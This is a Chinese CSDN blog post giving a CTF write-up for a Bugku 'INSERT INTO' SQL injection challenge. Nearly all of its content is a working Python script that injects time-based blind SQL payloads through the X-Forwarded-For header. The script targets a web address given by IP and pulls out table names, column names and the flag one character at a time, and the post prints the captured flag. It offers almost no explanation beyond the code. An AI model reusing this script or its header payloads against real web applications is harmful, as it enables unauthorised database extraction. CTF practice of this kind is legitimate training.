bugku-INSERT INTO注入(附代码) 详细

最新推荐文章于 2024-07-03 07:00:00 发布

偷一个月亮

最新推荐文章于 2024-07-03 07:00:00 发布

阅读量656

点赞数

分类专栏： CTF PHP SQL注入文章标签： CTF web php 注入

本文为博主原创文章，未经博主允许不得转载，否则追究法律责任。

本文链接：https://blog.csdn.net/yiqiushi4748/article/details/92847530

版权

CTF 同时被 3 个专栏收录

44 篇文章 6 订阅

订阅专栏

PHP

36 篇文章 1 订阅

订阅专栏

SQL注入

7 篇文章 0 订阅

订阅专栏

在这里插入图片描述

# -*-coding:utf-8-*-
# author : wen
# flag:wen{b7bb30b3435f2e7c418b131f9e789f81}

import requests
import time

url = 'http://123.206.87.240:8002/web15/'
payload = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.{}'
data = ''

for i in range(1,40):
	for p in range(32,126):
		starttime = time.time()
		
		#XFF = u"1'and (select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database())from %d for 1)) = %d) then sleep(4) else 1 end) and '1'='1" %(i,p)
		
		#XFF = u"1'and (select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag')from %d for 1)) = %d) then sleep(4) else 1 end) and '1'='1" %(i,p) 
		XFF = u"1'and (select case when (ascii(substr((select flag from flag)from %d for 1)) = %d) then sleep(4) else 1 end) and '1'='1" %(i,p) 

		#127.0.0.1'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))
		#print XFF
		headers = {'X-Forwarded-For':XFF}
		html = requests.get(url,headers=headers)
		if time.time() - starttime > 3:
			data += chr(p)
			print "i===="+str(i)+"\n p==="+str(p)
			print data
print "=================================>"
print "F L A G\n" + data

偷一个月亮

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
bugku-INSERT INTO注入(附代码) 详细

# -*-coding:utf-8-*-# author : wen# flag:wen{b7bb30b3435f2e7c418b131f9e789f81}import requestsimport timeurl = 'http://123.206.87.240:8002/web15/'payload = 'abcdefghigklmnopqrstuvwxyzABCDEFGHI...
复制链接

扫一扫

专栏目录